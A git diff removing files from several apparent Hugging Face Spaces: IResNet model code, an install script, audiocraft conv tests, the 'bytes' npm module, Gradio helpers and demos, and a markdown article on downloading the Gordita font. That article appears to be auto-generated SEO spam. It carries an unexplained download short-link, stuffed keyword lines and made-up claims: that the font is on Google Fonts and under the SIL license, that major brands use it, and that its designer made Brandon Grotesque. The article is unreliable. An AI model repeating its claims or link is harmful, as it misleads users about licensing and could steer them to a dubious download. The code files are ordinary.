width_per_group - self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=3, stride=1, padding=1, bias=False) - self.bn1 = nn.BatchNorm2d(self.inplanes, eps=1e-05) - self.prelu = nn.PReLU(self.inplanes) - self.layer1 = self._make_layer(block, 64, layers[0], stride=2) - self.layer2 = self._make_layer(block, - 128, - layers[1], - stride=2, - dilate=replace_stride_with_dilation[0]) - self.layer3 = self._make_layer(block, - 256, - layers[2], - stride=2, - dilate=replace_stride_with_dilation[1]) - self.layer4 = self._make_layer(block, - 512, - layers[3], - stride=2, - dilate=replace_stride_with_dilation[2]) - self.bn2 = nn.BatchNorm2d(512 * block.expansion, eps=1e-05, ) - self.dropout = nn.Dropout(p=dropout, inplace=True) - self.fc = nn.Linear(512 * block.expansion * self.fc_scale, num_features) - self.features = nn.BatchNorm1d(num_features, 
eps=1e-05) - nn.init.constant_(self.features.weight, 1.0) - self.features.weight.requires_grad = False - - for m in self.modules(): - if isinstance(m, nn.Conv2d): - nn.init.normal_(m.weight, 0, 0.1) - elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)): - nn.init.constant_(m.weight, 1) - nn.init.constant_(m.bias, 0) - - if zero_init_residual: - for m in self.modules(): - if isinstance(m, IBasicBlock): - nn.init.constant_(m.bn2.weight, 0) - - def _make_layer(self, block, planes, blocks, stride=1, dilate=False): - downsample = None - previous_dilation = self.dilation - if dilate: - self.dilation *= stride - stride = 1 - if stride != 1 or self.inplanes != planes * block.expansion: - downsample = nn.Sequential( - conv1x1(self.inplanes, planes * block.expansion, stride), - nn.BatchNorm2d(planes * block.expansion, eps=1e-05, ), - ) - layers = [] - layers.append( - block(self.inplanes, planes, stride, downsample, self.groups, - self.base_width, previous_dilation)) - self.inplanes = planes * block.expansion - for _ in range(1, blocks): - layers.append( - block(self.inplanes, - planes, - groups=self.groups, - base_width=self.base_width, - dilation=self.dilation)) - - return nn.Sequential(*layers) - - def checkpoint(self, func, num_seg, x): - if self.training: - return checkpoint_sequential(func, num_seg, x) - else: - return func(x) - - def forward(self, x): - with torch.cuda.amp.autocast(self.fp16): - x = self.conv1(x) - x = self.bn1(x) - x = self.prelu(x) - x = self.layer1(x) - x = self.checkpoint(self.layer2, 20, x) - x = self.checkpoint(self.layer3, 100, x) - x = self.layer4(x) - x = self.bn2(x) - x = torch.flatten(x, 1) - x = self.dropout(x) - x = self.fc(x.float() if self.fp16 else x) - x = self.features(x) - return x - - -def _iresnet(arch, block, layers, pretrained, progress, **kwargs): - model = IResNet(block, layers, **kwargs) - if pretrained: - raise ValueError() - return model - - -def iresnet2060(pretrained=False, progress=True, **kwargs): - return _iresnet('iresnet2060', IBasicBlock, [3, 128, 1024 - 128, 3], pretrained, progress, **kwargs) diff --git a/spaces/feng2022/Time-TravelRephotography/Time_TravelRephotography/scripts/install.sh b/spaces/feng2022/Time-TravelRephotography/Time_TravelRephotography/scripts/install.sh deleted file mode 100644 index 7f9d8f49eb0b5359766eff5fd83de6cddee90eeb..0000000000000000000000000000000000000000 --- a/spaces/feng2022/Time-TravelRephotography/Time_TravelRephotography/scripts/install.sh +++ /dev/null @@ -1,6 +0,0 @@ -# conda create -n stylegan python=3.7 -# conda activate stylegan -conda install -c conda-forge/label/gcc7 opencv --yes -conda install tensorflow-gpu=1.15 cudatoolkit=10.0 --yes -conda install pytorch torchvision cudatoolkit=10.0 -c pytorch --yes -pip install -r requirements.txt diff --git a/spaces/feregVcuzo/sanity-test-midi/checkpoint/Download Gordita a Minimal and Optically Balanced Typeface.md b/spaces/feregVcuzo/sanity-test-midi/checkpoint/Download Gordita a Minimal and Optically Balanced Typeface.md deleted file mode 100644 index a37ced576bc7c691f498e4dd4dde84ec6f965157..0000000000000000000000000000000000000000 --- a/spaces/feregVcuzo/sanity-test-midi/checkpoint/Download Gordita a Minimal and Optically Balanced Typeface.md +++ /dev/null @@ -1,174 +0,0 @@ - -

          How to Download Gordita Font for Your Website

          -

          If you are looking for a minimal, geometric, and friendly sans serif font for your website, you might want to consider Gordita font. Gordita font is a modern typeface that has a human touch and a subtle personality. It is suitable for various web design projects, such as headlines, logos, banners, menus, and body text. In this article, we will show you how to download Gordita font for free from different sources, how to install it on your computer, and how to use it on your website.

          -

          What is Gordita Font and Why Use It?

          -

          Gordita font is a sans serif typeface that was designed by Thomas Gillett and published by Type Atelier. It is based on the popular Futura font, but with more organic and harmonious strokes. It also has some features inspired by Gotham font, such as the ink traps and the tapered joints. Gordita font has been tested in print and on screen in a wide range of sizes and weights. It supports over two hundred languages with an extended Latin and Cyrillic character set.

          -

          download gordita font


          Downloadhttps://gohhs.com/2uPrxd



          -

          Gordita Font Features and Characteristics

          -

          Gordita font has 14 styles, including seven weights (from thin to ultra) and matching italics. The italics are slightly lighter and narrower than the upright versions, and they slant at 15 degrees. The font also has many OpenType features, such as alternate glyphs, fractions, case sensitive forms, small figures, arrows, symbols, old style and tabular figures. Here is a table that shows some of the features of Gordita font:

          [The feature table in the original source is empty here; its cell contents are not recoverable.]

          Gordita Font Use Cases and Examples

          -

          Gordita font is a versatile typeface that can be used for various web design projects. It can create a clean, modern, and elegant look for your website. It can also convey a friendly, warm, and inviting tone for your audience. Here are some examples of websites that use Gordita font:

          -
            -
          • Airbnb: This popular online marketplace for travel and accommodation uses Gordita font for its logo, headlines, and body text. The font helps to create a sense of trust, comfort, and adventure for the users.
          • -
          • Spotify: This leading music streaming service uses Gordita font for its logo, menus, buttons, and labels. The font helps to create a sleek, minimal, and stylish interface for the users.
          • -
          • Shopify: This powerful e-commerce platform uses Gordita font for its logo, headings, and subheadings. The font helps to create a professional, reliable, and easy-to-use website for the users.
          • -
          • Dropbox: This cloud storage and file sharing service uses Gordita font for its logo, headings, and body text. The font helps to create a simple, clear, and secure website for the users.
          • -
          • Netflix: This popular online video streaming service uses Gordita font for its logo, menus, buttons, and labels. The font helps to create a dynamic, engaging, and entertaining website for the users.
          • -
          -

          Where to Find Gordita Font Online

          -

          If you want to download Gordita font for free, you have several options to choose from. Here are some of the best places to find Gordita font online:

          -

          Google Fonts

          -

          Google Fonts is one of the most popular and reliable sources of free fonts on the web. It has over 1,000 fonts that you can browse, preview, and download for your personal or commercial projects. You can also embed the fonts on your website using a simple code snippet. To find Gordita font on Google Fonts, you can use the search bar or the filter options. Here is the link to Gordita font on Google Fonts: https://fonts.google.com/specimen/Gordita

          -

          Fonts.com + SkyFonts

          -

          Fonts.com is another great source of free fonts on the web. It has over 150,000 fonts that you can browse, preview, and download for your personal or commercial projects. You can also sync the fonts on your computer using SkyFonts, a free app that lets you access and manage your fonts online. To find Gordita font on Fonts.com + SkyFonts, you can use the search bar or the filter options. Here is the link to Gordita font on Fonts.com + SkyFonts: https://www.fonts.com/font/type-atelier/gordita

          -

          FontBundles Free Fonts Collection

          -

          FontBundles is another awesome source of free fonts on the web. It has over 500 fonts that you can browse, preview, and download for your personal or commercial projects. You can also get access to exclusive deals and discounts on premium fonts every week. To find Gordita font on FontBundles Free Fonts Collection, you can use the search bar or the filter options. Here is the link to Gordita font on FontBundles Free Fonts Collection: https://fontbundles.net/free-fonts/gordita

          -

          Other Font Websites

          -

          There are many other websites that offer free fonts on the web. Some of them are:

          -
            -
          • DaFont: This website has over 40,000 fonts that you can browse, preview, and download for your personal or non-commercial projects.
          • -
          • Font Squirrel: This website has over 1,500 fonts that you can browse, preview, and download for your personal or commercial projects.
          • -
          • FontSpace: This website has over 80,000 fonts that you can browse, preview, and download for your personal or non-commercial projects.
          • -
          • UrbanFonts: This website has over 8,000 fonts that you can browse, preview, and download for your personal or non-commercial projects.
          • -
          -

          However, before you download any font from these websites, make sure to check the license and terms of use. Some fonts may have restrictions or limitations on how you can use them.

          -

          How to download gordita font for free
          -Download gordita font family with 14 styles
          -Gordita font webfont and desktop license
          -Gordita font features and opentype options
          -Gordita font review and comparison
          -Best websites to download gordita font
          -Gordita font alternatives and similar fonts
          -Gordita font usage and examples
          -Gordita font download link and installation guide
          -Gordita font discount and coupon code
          -Download gordita font for Mac and Windows
          -Gordita font compatibility and support
          -Gordita font thin and ultra weights
          -Gordita font design and history
          -Gordita font typography and inspiration
          -Download gordita font for logo and branding
          -Gordita font for print and web design
          -Gordita font for digital and email marketing
          -Gordita font for social media and content creation
          -Gordita font for UI and UX design
          -Download gordita font for WordPress and Shopify
          -Gordita font for e-commerce and online store
          -Gordita font for blog and magazine
          -Gordita font for portfolio and resume
          -Gordita font for presentation and infographic
          -Download gordita font for Adobe Photoshop and Illustrator
          -Gordita font for Figma and Sketch
          -Gordita font for Canva and Procreate
          -Gordita font for Microsoft Word and PowerPoint
          -Gordita font for Google Docs and Slides
          -Download gordita black italic and bold italic fonts
          -Download gordita light italic and medium italic fonts
          -Download gordita regular italic and thin italic fonts
          -Download gordita ultra italic and ultra fonts
          -Download gordita black and bold fonts
          -Download gordita light and medium fonts
          -Download gordita regular and thin fonts
          -Gordita black italic vs bold italic fonts comparison
          -Gordita light italic vs medium italic fonts comparison
          -Gordita regular italic vs thin italic fonts comparison

          -

          How to Install Gordita Font on Your Computer

          -

          Once you have downloaded Gordita font from one of the sources above, you need to install it on your computer so that you can use it in your applications. The installation process may vary depending on your operating system, but here are the general steps:

          -

          Download the Font Files

          -

          The first step is to download the font files from the website. Usually, the font files are compressed in a ZIP or RAR file. You need to save the file to a location that you can easily access, such as your desktop or downloads folder.

          -

          Unzip the Font Files

          -

          The next step is to unzip the font files from the compressed file. You can use a software like WinZip, WinRAR, or 7-Zip to extract the files. You should see one or more files with extensions like .otf, .ttf, or .woff. These are the font files that you need to install.

          -

          Install the Font Files

          -

          The final step is to install the font files on your computer. The method may differ depending on your operating system, but here are some common ways:

          -
            -
          • For Windows: Right-click on the font file and select Install. Alternatively, you can copy and paste the font file to the Fonts folder in your Control Panel.
          • -
          • For Mac: Double-click on the font file and click Install Font. Alternatively, you can drag and drop the font file to the Fonts folder in your Library.
          • -
          • For Linux: Copy and paste the font file to the .fonts folder in your home directory. Alternatively, you can use a font manager like Fonty Python or Font Manager.
          • -
          -

          After installing the font files, you should be able to use Gordita font in your applications.
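
          If you prefer to script the Linux case, here is a minimal, hedged Python sketch that copies a downloaded font file into the .fonts folder in your home directory; the source path and filename are assumptions, so replace them with wherever you saved your file.

          # Copy a downloaded font into ~/.fonts for the current user (Linux)
          import shutil
          from pathlib import Path

          font_file = Path("~/Downloads/gordita-regular.otf").expanduser()  # assumed download location
          fonts_dir = Path("~/.fonts").expanduser()
          fonts_dir.mkdir(parents=True, exist_ok=True)
          shutil.copy2(font_file, fonts_dir / font_file.name)
          # Optionally refresh the font cache so applications pick it up right away:
          # import subprocess; subprocess.run(["fc-cache", "-f"], check=True)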

          -

          How to Use Gordita Font on Your Website

          -

          If you want to use Gordita font on your website, you have two main options: embed the font with @font-face or use a webfont service. Here are the pros and cons of each option:

          -

          Embed the Font with @font-face

          -

          This option allows you to host the font files on your own server and link them to your website using CSS. You need to have a license that allows web usage for this option. Here are some advantages and disadvantages of this option:

          -
            -
          • Advantages: You have full control over the font files and how they are displayed on your website. You can customize the font size, weight, style, and other properties. You can also optimize the loading speed and performance of your website.
          • -
          • Disadvantages: You need to have technical skills and knowledge to implement this option. You also need to make sure that you have all the necessary formats and fallbacks for different browsers and devices. You may also face legal issues if you do not have a proper license for web usage.
          • -
          -

          To embed Gordita font with @font-face, you need to follow these steps:

          -
            -
          1. Upload the font files to your server in a folder that is accessible by your website.
          2. -
          3. Add a CSS code snippet to your stylesheet that links to the font files and defines their properties. For example:
          4. -
            @font-face {
              font-family: 'Gordita';
              src: url('fonts/gordita-regular.otf') format('opentype'),
                   url('fonts/gordita-regular.ttf') format('truetype'),
                   url('fonts/gordita-regular.woff') format('woff');
              font-weight: normal;
              font-style: normal;
            }

            /* Use Gordita font for headings */
            h1, h2, h3 {
              font-family: 'Gordita', sans-serif;
            }
            -
          5. Use Gordita font for your website elements by specifying its name in the CSS property font-family. For example:
          6. -
            p {
              font-family: 'Gordita', sans-serif;
            }
            -
          -

          Use a Webfont Service

          -

          This option allows you to use a third-party service that hosts and delivers the font files for your website. You do not need to have a license for this option, as it is provided by the service provider. Here are some advantages and disadvantages of this option:

          -
            -
          • Advantages: You do not need to have technical skills or knowledge to implement this option. You also do not need to worry about the license, formats, fallbacks, or performance of the font files. You can easily access and manage the fonts from a user-friendly interface.
          • -
          • Disadvantages: You have less control over the font files and how they are displayed on your website. You also depend on the service provider for the availability and quality of the font files. You may also face some limitations or costs depending on the service provider.
          • -
          -

          To use a webfont service for Gordita font, you need to follow these steps:

          -
            -
          1. Choose a webfont service that offers Gordita font. Some of the popular webfont services are Google Fonts, Fonts.com + SkyFonts, Adobe Fonts, and Fontspring.
          2. -
          3. Sign up for an account and create a project for your website.
          4. -
          5. Select Gordita font and the styles and weights that you want to use for your website.
          6. -
          7. Copy and paste the code snippet that the service provider gives you to your website's <head> section. For example:
          8. -
            <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Gordita:400,400i,700,700i"> 
            -
          9. Use Gordita font for your website elements by specifying its name in the CSS property font-family. For example:
          10. -
            p {
              font-family: 'Gordita', sans-serif;
            }
            -
          -

          Conclusion and FAQs

          -

          Gordita font is a beautiful and versatile sans serif typeface that can enhance your web design projects. It has a minimal, geometric, and friendly appearance that can suit various purposes and styles. It also has many features and characteristics that can make your website more readable and attractive. You can download Gordita font for free from different sources online, install it on your computer, and use it on your website with ease. Whether you choose to embed the font with @font-face or use a webfont service, you can enjoy the benefits of Gordita font on your website.

          -

          Here are some frequently asked questions about Gordita font:

          -
            -
          • Q: What is the license of Gordita font?
          • -
          • A: Gordita font is licensed under the SIL Open Font License (OFL), which means that you can use it for free for both personal and commercial projects. However, you must not sell or distribute the font files without permission from the author. You must also keep the original license and documentation files with the font files.
          • -
          • Q: How can I customize Gordita font for my website?
          • -
          • A: You can customize Gordita font for your website by using CSS properties such as font-size, font-weight, font-style, color, text-align, text-transform, letter-spacing, line-height, and more. You can also use OpenType features such as alternate glyphs, fractions, case sensitive forms, small figures, arrows, symbols, old style and tabular figures by using CSS properties such as font-feature-settings or font-variant.
          • -
          • Q: How can I pair Gordita font with other fonts for my website?
          • -
          • A: You can pair Gordita font with other fonts for your website by following some basic principles of typography, such as contrast, harmony, hierarchy, and balance. You can also use online tools such as FontPair or Typ.io to find suitable font combinations for Gordita font.
          • -
          • Q: How can I optimize Gordita font for my website?
          • -
          • A: You can optimize Gordita font for your website by following some best practices of web typography, such as choosing the right format and weight, using a fallback font, setting a proper line length and spacing, adjusting the vertical rhythm and alignment, testing the readability and accessibility, and using webfont performance tools such as Web Font Loader or Font Face Observer.
          • -
          • Q: Where can I find more information about Gordita font?
          • -
          • A: You can find more information about Gordita font on its official website: https://gorditafont.com/. There you can learn more about the history, design, features, and usage of Gordita font. You can also contact the author or follow him on social media for updates and feedback. You can also check out some of his other fonts, such as Brandon Grotesque, Brandon Text, and Brandon Printed.
          • -
          -

          I hope you enjoyed this article and learned how to download Gordita font for your website. If you have any questions or comments, please feel free to leave them below. Thank you for reading and happy designing!

          401be4b1e0
          -
          -
          \ No newline at end of file diff --git a/spaces/fffiloni/SplitTrack2MusicGen/tests/modules/test_conv.py b/spaces/fffiloni/SplitTrack2MusicGen/tests/modules/test_conv.py deleted file mode 100644 index 28fbc4f1a0ebaf41b56947b767958ae696e75eec..0000000000000000000000000000000000000000 --- a/spaces/fffiloni/SplitTrack2MusicGen/tests/modules/test_conv.py +++ /dev/null @@ -1,203 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -from itertools import product -import math -import random - -import pytest -import torch -from torch import nn - -from audiocraft.modules import ( - NormConv1d, - NormConvTranspose1d, - StreamableConv1d, - StreamableConvTranspose1d, - pad1d, - unpad1d, -) - - -def test_get_extra_padding_for_conv1d(): - # TODO: Implement me! - pass - - -def test_pad1d_zeros(): - x = torch.randn(1, 1, 20) - - xp1 = pad1d(x, (0, 5), mode='constant', value=0.) - assert xp1.shape[-1] == 25 - xp2 = pad1d(x, (5, 5), mode='constant', value=0.) - assert xp2.shape[-1] == 30 - xp3 = pad1d(x, (0, 0), mode='constant', value=0.) - assert xp3.shape[-1] == 20 - xp4 = pad1d(x, (10, 30), mode='constant', value=0.) - assert xp4.shape[-1] == 60 - - with pytest.raises(AssertionError): - pad1d(x, (-1, 0), mode='constant', value=0.) - - with pytest.raises(AssertionError): - pad1d(x, (0, -1), mode='constant', value=0.) - - with pytest.raises(AssertionError): - pad1d(x, (-1, -1), mode='constant', value=0.) - - -def test_pad1d_reflect(): - x = torch.randn(1, 1, 20) - - xp1 = pad1d(x, (0, 5), mode='reflect', value=0.) - assert xp1.shape[-1] == 25 - xp2 = pad1d(x, (5, 5), mode='reflect', value=0.) - assert xp2.shape[-1] == 30 - xp3 = pad1d(x, (0, 0), mode='reflect', value=0.) - assert xp3.shape[-1] == 20 - xp4 = pad1d(x, (10, 30), mode='reflect', value=0.) - assert xp4.shape[-1] == 60 - - with pytest.raises(AssertionError): - pad1d(x, (-1, 0), mode='reflect', value=0.) - - with pytest.raises(AssertionError): - pad1d(x, (0, -1), mode='reflect', value=0.) - - with pytest.raises(AssertionError): - pad1d(x, (-1, -1), mode='reflect', value=0.) 
- - -def test_unpad1d(): - x = torch.randn(1, 1, 20) - - u1 = unpad1d(x, (5, 5)) - assert u1.shape[-1] == 10 - u2 = unpad1d(x, (0, 5)) - assert u2.shape[-1] == 15 - u3 = unpad1d(x, (5, 0)) - assert u3.shape[-1] == 15 - u4 = unpad1d(x, (0, 0)) - assert u4.shape[-1] == x.shape[-1] - - with pytest.raises(AssertionError): - unpad1d(x, (-1, 0)) - - with pytest.raises(AssertionError): - unpad1d(x, (0, -1)) - - with pytest.raises(AssertionError): - unpad1d(x, (-1, -1)) - - -class TestNormConv1d: - - def test_norm_conv1d_modules(self): - N, C, T = 2, 2, random.randrange(1, 100_000) - t0 = torch.randn(N, C, T) - - C_out, kernel_size, stride = 1, 4, 1 - expected_out_length = int((T - kernel_size) / stride + 1) - wn_conv = NormConv1d(C, 1, kernel_size=4, norm='weight_norm') - gn_conv = NormConv1d(C, 1, kernel_size=4, norm='time_group_norm') - nn_conv = NormConv1d(C, 1, kernel_size=4, norm='none') - - assert isinstance(wn_conv.norm, nn.Identity) - assert isinstance(wn_conv.conv, nn.Conv1d) - - assert isinstance(gn_conv.norm, nn.GroupNorm) - assert isinstance(gn_conv.conv, nn.Conv1d) - - assert isinstance(nn_conv.norm, nn.Identity) - assert isinstance(nn_conv.conv, nn.Conv1d) - - for conv_layer in [wn_conv, gn_conv, nn_conv]: - out = conv_layer(t0) - assert isinstance(out, torch.Tensor) - assert list(out.shape) == [N, C_out, expected_out_length] - - -class TestNormConvTranspose1d: - - def test_normalizations(self): - N, C, T = 2, 2, random.randrange(1, 100_000) - t0 = torch.randn(N, C, T) - - C_out, kernel_size, stride = 1, 4, 1 - expected_out_length = (T - 1) * stride + (kernel_size - 1) + 1 - - wn_convtr = NormConvTranspose1d(C, C_out, kernel_size=kernel_size, stride=stride, norm='weight_norm') - gn_convtr = NormConvTranspose1d(C, C_out, kernel_size=kernel_size, stride=stride, norm='time_group_norm') - nn_convtr = NormConvTranspose1d(C, C_out, kernel_size=kernel_size, stride=stride, norm='none') - - assert isinstance(wn_convtr.norm, nn.Identity) - assert isinstance(wn_convtr.convtr, nn.ConvTranspose1d) - - assert isinstance(gn_convtr.norm, nn.GroupNorm) - assert isinstance(gn_convtr.convtr, nn.ConvTranspose1d) - - assert isinstance(nn_convtr.norm, nn.Identity) - assert isinstance(nn_convtr.convtr, nn.ConvTranspose1d) - - for convtr_layer in [wn_convtr, gn_convtr, nn_convtr]: - out = convtr_layer(t0) - assert isinstance(out, torch.Tensor) - assert list(out.shape) == [N, C_out, expected_out_length] - - -class TestStreamableConv1d: - - def get_streamable_conv1d_output_length(self, length, kernel_size, stride, dilation): - # StreamableConv1d internally pads to make sure that the last window is full - padding_total = (kernel_size - 1) * dilation - (stride - 1) - n_frames = (length - kernel_size + padding_total) / stride + 1 - ideal_length = (math.ceil(n_frames) - 1) * stride + (kernel_size - padding_total) - return ideal_length // stride - - def test_streamable_conv1d(self): - N, C, T = 2, 2, random.randrange(1, 100_000) - t0 = torch.randn(N, C, T) - C_out = 1 - - # conv params are [(kernel_size, stride, dilation)] - conv_params = [(4, 1, 1), (4, 2, 1), (3, 1, 3), (10, 5, 1), (3, 2, 3)] - for causal, (kernel_size, stride, dilation) in product([False, True], conv_params): - expected_out_length = self.get_streamable_conv1d_output_length(T, kernel_size, stride, dilation) - sconv = StreamableConv1d(C, C_out, kernel_size=kernel_size, stride=stride, dilation=dilation, causal=causal) - out = sconv(t0) - assert isinstance(out, torch.Tensor) - print(list(out.shape), [N, C_out, expected_out_length]) - assert 
list(out.shape) == [N, C_out, expected_out_length] - - -class TestStreamableConvTranspose1d: - - def get_streamable_convtr1d_output_length(self, length, kernel_size, stride): - padding_total = (kernel_size - stride) - return (length - 1) * stride - padding_total + (kernel_size - 1) + 1 - - def test_streamable_convtr1d(self): - N, C, T = 2, 2, random.randrange(1, 100_000) - t0 = torch.randn(N, C, T) - - C_out = 1 - - with pytest.raises(AssertionError): - StreamableConvTranspose1d(C, C_out, kernel_size=4, causal=False, trim_right_ratio=0.5) - StreamableConvTranspose1d(C, C_out, kernel_size=4, causal=True, trim_right_ratio=-1.) - StreamableConvTranspose1d(C, C_out, kernel_size=4, causal=True, trim_right_ratio=2) - - # causal params are [(causal, trim_right)] - causal_params = [(False, 1.0), (True, 1.0), (True, 0.5), (True, 0.0)] - # conv params are [(kernel_size, stride)] - conv_params = [(4, 1), (4, 2), (3, 1), (10, 5)] - for ((causal, trim_right_ratio), (kernel_size, stride)) in product(causal_params, conv_params): - expected_out_length = self.get_streamable_convtr1d_output_length(T, kernel_size, stride) - sconvtr = StreamableConvTranspose1d(C, C_out, kernel_size=kernel_size, stride=stride, - causal=causal, trim_right_ratio=trim_right_ratio) - out = sconvtr(t0) - assert isinstance(out, torch.Tensor) - assert list(out.shape) == [N, C_out, expected_out_length] diff --git a/spaces/fffiloni/controlnet-animation-doodle/node_modules/bytes/index.js b/spaces/fffiloni/controlnet-animation-doodle/node_modules/bytes/index.js deleted file mode 100644 index 6f2d0f89e1258564bad95175159e1d8a6abd9ddf..0000000000000000000000000000000000000000 --- a/spaces/fffiloni/controlnet-animation-doodle/node_modules/bytes/index.js +++ /dev/null @@ -1,170 +0,0 @@ -/*! - * bytes - * Copyright(c) 2012-2014 TJ Holowaychuk - * Copyright(c) 2015 Jed Watson - * MIT Licensed - */ - -'use strict'; - -/** - * Module exports. - * @public - */ - -module.exports = bytes; -module.exports.format = format; -module.exports.parse = parse; - -/** - * Module variables. - * @private - */ - -var formatThousandsRegExp = /\B(?=(\d{3})+(?!\d))/g; - -var formatDecimalsRegExp = /(?:\.0*|(\.[^0]+)0+)$/; - -var map = { - b: 1, - kb: 1 << 10, - mb: 1 << 20, - gb: 1 << 30, - tb: Math.pow(1024, 4), - pb: Math.pow(1024, 5), -}; - -var parseRegExp = /^((-|\+)?(\d+(?:\.\d+)?)) *(kb|mb|gb|tb|pb)$/i; - -/** - * Convert the given value in bytes into a string or parse to string to an integer in bytes. - * - * @param {string|number} value - * @param {{ - * case: [string], - * decimalPlaces: [number] - * fixedDecimals: [boolean] - * thousandsSeparator: [string] - * unitSeparator: [string] - * }} [options] bytes options. - * - * @returns {string|number|null} - */ - -function bytes(value, options) { - if (typeof value === 'string') { - return parse(value); - } - - if (typeof value === 'number') { - return format(value, options); - } - - return null; -} - -/** - * Format the given value in bytes into a string. - * - * If the value is negative, it is kept as such. If it is a float, - * it is rounded. 
- * - * @param {number} value - * @param {object} [options] - * @param {number} [options.decimalPlaces=2] - * @param {number} [options.fixedDecimals=false] - * @param {string} [options.thousandsSeparator=] - * @param {string} [options.unit=] - * @param {string} [options.unitSeparator=] - * - * @returns {string|null} - * @public - */ - -function format(value, options) { - if (!Number.isFinite(value)) { - return null; - } - - var mag = Math.abs(value); - var thousandsSeparator = (options && options.thousandsSeparator) || ''; - var unitSeparator = (options && options.unitSeparator) || ''; - var decimalPlaces = (options && options.decimalPlaces !== undefined) ? options.decimalPlaces : 2; - var fixedDecimals = Boolean(options && options.fixedDecimals); - var unit = (options && options.unit) || ''; - - if (!unit || !map[unit.toLowerCase()]) { - if (mag >= map.pb) { - unit = 'PB'; - } else if (mag >= map.tb) { - unit = 'TB'; - } else if (mag >= map.gb) { - unit = 'GB'; - } else if (mag >= map.mb) { - unit = 'MB'; - } else if (mag >= map.kb) { - unit = 'KB'; - } else { - unit = 'B'; - } - } - - var val = value / map[unit.toLowerCase()]; - var str = val.toFixed(decimalPlaces); - - if (!fixedDecimals) { - str = str.replace(formatDecimalsRegExp, '$1'); - } - - if (thousandsSeparator) { - str = str.split('.').map(function (s, i) { - return i === 0 - ? s.replace(formatThousandsRegExp, thousandsSeparator) - : s - }).join('.'); - } - - return str + unitSeparator + unit; -} - -/** - * Parse the string value into an integer in bytes. - * - * If no unit is given, it is assumed the value is in bytes. - * - * @param {number|string} val - * - * @returns {number|null} - * @public - */ - -function parse(val) { - if (typeof val === 'number' && !isNaN(val)) { - return val; - } - - if (typeof val !== 'string') { - return null; - } - - // Test if the string passed is valid - var results = parseRegExp.exec(val); - var floatValue; - var unit = 'b'; - - if (!results) { - // Nothing could be extracted from the given string - floatValue = parseInt(val, 10); - unit = 'b' - } else { - // Retrieve the value and the unit - floatValue = parseFloat(results[1]); - unit = results[4].toLowerCase(); - } - - if (isNaN(floatValue)) { - return null; - } - - return Math.floor(map[unit] * floatValue); -} diff --git a/spaces/fiyen/YangyangChatGPT/modules/overwrites.py b/spaces/fiyen/YangyangChatGPT/modules/overwrites.py deleted file mode 100644 index bfcd4d01b7d7bec1184a8d09113933bca860530b..0000000000000000000000000000000000000000 --- a/spaces/fiyen/YangyangChatGPT/modules/overwrites.py +++ /dev/null @@ -1,56 +0,0 @@ -from __future__ import annotations -import logging - -from llama_index import Prompt -from typing import List, Tuple -import mdtex2html - -from modules.presets import * -from modules.llama_func import * - - -def compact_text_chunks(self, prompt: Prompt, text_chunks: List[str]) -> List[str]: - logging.debug("Compacting text chunks...🚀🚀🚀") - combined_str = [c.strip() for c in text_chunks if c.strip()] - combined_str = [f"[{index+1}] {c}" for index, c in enumerate(combined_str)] - combined_str = "\n\n".join(combined_str) - # resplit based on self.max_chunk_overlap - text_splitter = self.get_text_splitter_given_prompt(prompt, 1, padding=1) - return text_splitter.split_text(combined_str) - - -def postprocess( - self, y: List[Tuple[str | None, str | None]] -) -> List[Tuple[str | None, str | None]]: - """ - Parameters: - y: List of tuples representing the message and response pairs. 
Each message and response should be a string, which may be in Markdown format. - Returns: - List of tuples representing the message and response. Each message and response will be a string of HTML. - """ - if y is None or y == []: - return [] - user, bot = y[-1] - if not detect_converted_mark(user): - user = convert_asis(user) - if not detect_converted_mark(bot): - bot = convert_mdtext(bot) - y[-1] = (user, bot) - return y - -with open("./assets/custom.js", "r", encoding="utf-8") as f, open("./assets/Kelpy-Codos.js", "r", encoding="utf-8") as f2: - customJS = f.read() - kelpyCodos = f2.read() - -def reload_javascript(): - print("Reloading javascript...") - js = f'' - def template_response(*args, **kwargs): - res = GradioTemplateResponseOriginal(*args, **kwargs) - res.body = res.body.replace(b'', f'{js}'.encode("utf8")) - res.init_headers() - return res - - gr.routes.templates.TemplateResponse = template_response - -GradioTemplateResponseOriginal = gr.routes.templates.TemplateResponse \ No newline at end of file diff --git a/spaces/freddyaboulton/3.1.4.9-all-demos/demos/calculator_blocks/run.py b/spaces/freddyaboulton/3.1.4.9-all-demos/demos/calculator_blocks/run.py deleted file mode 100644 index 957b8d9ab879493ea5b6072dbe5acdf1d6c52524..0000000000000000000000000000000000000000 --- a/spaces/freddyaboulton/3.1.4.9-all-demos/demos/calculator_blocks/run.py +++ /dev/null @@ -1,33 +0,0 @@ -import gradio as gr - - -def calculator(num1, operation, num2): - if operation == "add": - return num1 + num2 - elif operation == "subtract": - return num1 - num2 - elif operation == "multiply": - return num1 * num2 - elif operation == "divide": - return num1 / num2 - - -with gr.Blocks() as demo: - with gr.Row(): - with gr.Column(): - num_1 = gr.Number(value=4) - operation = gr.Radio(["add", "subtract", "multiply", "divide"]) - num_2 = gr.Number(value=0) - submit_btn = gr.Button(value="Calculate") - with gr.Column(): - result = gr.Number() - - submit_btn.click(calculator, inputs=[num_1, operation, num_2], outputs=[result]) - examples = gr.Examples(examples=[[5, "add", 3], - [4, "divide", 2], - [-4, "multiply", 2.5], - [0, "subtract", 1.2]], - inputs=[num_1, operation, num_2]) - -if __name__ == "__main__": - demo.launch() \ No newline at end of file diff --git a/spaces/freddyaboulton/3.1.4.9-all-demos/demos/chatbot_demo/run.py b/spaces/freddyaboulton/3.1.4.9-all-demos/demos/chatbot_demo/run.py deleted file mode 100644 index 482c9908994cd229c1ac7d52f3877f04c5813848..0000000000000000000000000000000000000000 --- a/spaces/freddyaboulton/3.1.4.9-all-demos/demos/chatbot_demo/run.py +++ /dev/null @@ -1,26 +0,0 @@ -import random -import gradio as gr - -def chat(message, history): - history = history or [] - message = message.lower() - if message.startswith("how many"): - response = random.randint(1, 10) - elif message.startswith("how"): - response = random.choice(["Great", "Good", "Okay", "Bad"]) - elif message.startswith("where"): - response = random.choice(["Here", "There", "Somewhere"]) - else: - response = "I don't know" - history.append((message, response)) - return history, history - -chatbot = gr.Chatbot().style(color_map=("green", "pink")) -demo = gr.Interface( - chat, - ["text", "state"], - [chatbot, "state"], - allow_flagging="never", -) -if __name__ == "__main__": - demo.launch() diff --git 